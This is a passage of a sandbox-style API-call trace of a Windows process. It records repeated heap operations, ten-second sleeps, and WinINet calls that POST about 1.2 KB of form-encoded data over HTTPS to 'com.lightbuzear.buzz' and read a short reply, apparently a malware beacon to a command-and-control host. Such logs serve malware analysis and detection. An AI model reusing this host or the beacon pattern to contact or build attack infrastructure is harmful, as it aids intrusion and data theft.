hHeap=0x4780000, dwFlags=0x0, lpMem=0x48153b0 | out: hHeap=0x4780000) returned 1 [0202.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48154a0 | out: hHeap=0x4780000) returned 1 [0202.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814d20 | out: hHeap=0x4780000) returned 1 [0202.288] Sleep (dwMilliseconds=0x2710) [0202.298] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6c0 [0202.298] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6e0 [0202.298] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0202.298] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce740 [0202.298] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0202.298] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0202.298] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0202.298] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce620 [0202.298] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0202.298] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fb68 [0202.298] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0202.298] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fb20 [0202.298] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fb68 | out: hHeap=0x4780000) returned 1 [0202.299] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0202.299] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fb20 | out: hHeap=0x4780000) returned 1 [0202.299] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481fb68 [0202.299] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829fd8 [0202.299] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829fd8 | out: hHeap=0x4780000) returned 1 [0202.299] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0202.299] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829df8 [0202.299] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0202.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0202.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0202.300] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0202.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce690 [0202.300] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0202.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0202.300] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0202.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0202.300] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0202.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fb20 [0202.300] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0202.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fb38 [0202.300] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fb20 | out: hHeap=0x4780000) returned 1 [0202.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0202.300] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fb38 | out: hHeap=0x4780000) returned 1 [0202.300] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4829e70 [0202.300] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0202.301] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0202.301] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829e70 | out: hHeap=0x4780000) returned 1 [0202.301] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829f60 [0202.301] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0202.301] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829e20 [0202.301] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0202.302] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0202.302] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0202.302] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0202.302] FreeLibrary (hLibModule=0x71780000) returned 1 [0202.302] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829e20 | out: hHeap=0x4780000) returned 1 [0202.303] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0202.303] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829fd8 [0202.303] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0202.303] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce600 [0202.303] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6c0 [0202.303] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0202.303] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce570 [0202.303] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0202.303] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6e0 [0202.303] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0202.303] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce630 [0202.303] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0202.303] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fb38 [0202.303] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0202.303] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fb80 [0202.303] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fb38 | out: hHeap=0x4780000) returned 1 [0202.303] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0202.303] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fb80 | out: hHeap=0x4780000) returned 1 [0202.303] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481fb80 [0202.303] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829f88 [0202.304] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829f88 | out: hHeap=0x4780000) returned 1 [0202.304] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0202.304] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a0f0 [0202.304] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0202.304] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a0a0 [0202.304] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6f0 [0202.304] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce630 [0202.304] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0202.304] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce640 [0202.304] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0202.304] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0202.304] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0202.304] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0202.304] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0202.304] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fb38 [0202.304] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0202.304] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fb98 [0202.304] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fb38 | out: hHeap=0x4780000) returned 1 [0202.304] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0202.305] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fb98 | out: hHeap=0x4780000) returned 1 [0202.305] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481fb38 [0202.305] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a118 [0202.305] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a118 | out: hHeap=0x4780000) returned 1 [0202.305] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0202.305] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0202.305] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce620 [0202.305] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce750 [0202.305] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0202.305] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6e0 [0202.305] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0202.305] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0202.305] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0202.305] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0202.305] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0202.305] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f4708 [0202.306] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0202.306] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0b48 [0202.306] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4708 | out: hHeap=0x4780000) returned 1 [0202.306] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0202.306] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0b48 | out: hHeap=0x4780000) returned 1 [0202.306] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x482a050 [0202.306] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0202.306] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb940 [0202.306] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a050 | out: hHeap=0x4780000) returned 1 [0202.306] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a140 [0202.306] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0202.306] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a0c8 [0202.306] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0202.307] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb940 | out: hHeap=0x4780000) returned 1 [0202.307] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0202.337] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0202.338] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a0c8 | out: hHeap=0x4780000) returned 1 [0202.338] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6b0 [0202.338] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce710 [0202.338] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0202.338] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0202.338] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0202.338] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0202.338] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0202.338] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6f0 [0202.338] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0202.338] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0b48 [0202.338] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0202.338] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f4708 [0202.338] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0b48 | out: hHeap=0x4780000) returned 1 [0202.338] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0202.338] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4708 | out: hHeap=0x4780000) returned 1 [0202.338] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4829f88 [0202.338] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0202.338] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0202.339] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829f88 | out: hHeap=0x4780000) returned 1 [0202.339] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829e20 [0202.339] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0202.339] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829d58 [0202.339] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0202.340] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0202.340] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0202.340] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0203.440] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829d58 | out: hHeap=0x4780000) returned 1 [0203.441] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0203.441] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0203.441] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0203.442] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce600 [0203.442] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6d0 [0203.442] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0203.442] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6b0 [0203.442] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0203.442] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0203.442] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0203.442] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6c0 [0203.442] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0203.442] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f4708 [0203.442] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0203.442] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47cd8f0 [0203.442] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4708 | out: hHeap=0x4780000) returned 1 [0203.442] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0203.442] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47cd8f0 | out: hHeap=0x4780000) returned 1 [0203.442] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x482a190 [0203.442] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0203.442] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0203.442] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a190 | out: hHeap=0x4780000) returned 1 [0203.442] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829e70 [0203.442] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0203.442] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829d08 [0203.443] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0203.443] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0203.443] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0203.443] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0203.444] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829d08 | out: hHeap=0x4780000) returned 1 [0203.444] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0203.444] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0203.444] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5c0 [0203.444] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0203.444] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0203.444] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0203.444] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce620 [0203.445] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0203.445] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0203.445] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0203.445] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47cd8f0 [0203.445] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0203.445] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f4708 [0203.445] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47cd8f0 | out: hHeap=0x4780000) returned 1 [0203.445] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0203.445] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4708 | out: hHeap=0x4780000) returned 1 [0203.445] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x482a118 [0203.445] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0203.445] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0203.445] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a118 | out: hHeap=0x4780000) returned 1 [0203.445] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829f88 [0203.445] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0203.445] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829fb0 [0203.445] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0203.446] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0203.446] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0203.446] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0203.447] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829fb0 | out: hHeap=0x4780000) returned 1 [0203.447] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0203.447] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0203.447] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0203.447] FreeLibrary (hLibModule=0x71570000) returned 1 [0203.447] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0203.447] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0203.448] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a0a0 | out: hHeap=0x4780000) returned 1 [0203.448] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a0f0 | out: hHeap=0x4780000) returned 1 [0203.448] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829fd8 | out: hHeap=0x4780000) returned 1 [0203.449] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829df8 | out: hHeap=0x4780000) returned 1 [0203.449] Sleep (dwMilliseconds=0x2710) [0203.582] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce600 [0203.582] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5c0 [0203.583] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0203.583] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5b0 [0203.583] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0203.583] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce630 [0203.583] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0203.583] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce680 [0203.583] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0203.583] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f4708 [0203.583] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0203.583] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fb20 [0203.583] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f4708 | out: hHeap=0x4780000) returned 1 [0203.583] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0203.583] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fb20 | out: hHeap=0x4780000) returned 1 [0203.583] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481fb98 [0203.583] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829fd8 [0203.584] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829fd8 | out: hHeap=0x4780000) returned 1 [0203.584] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0203.584] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a190 [0203.584] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0203.584] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0203.584] RtlAllocateHeap 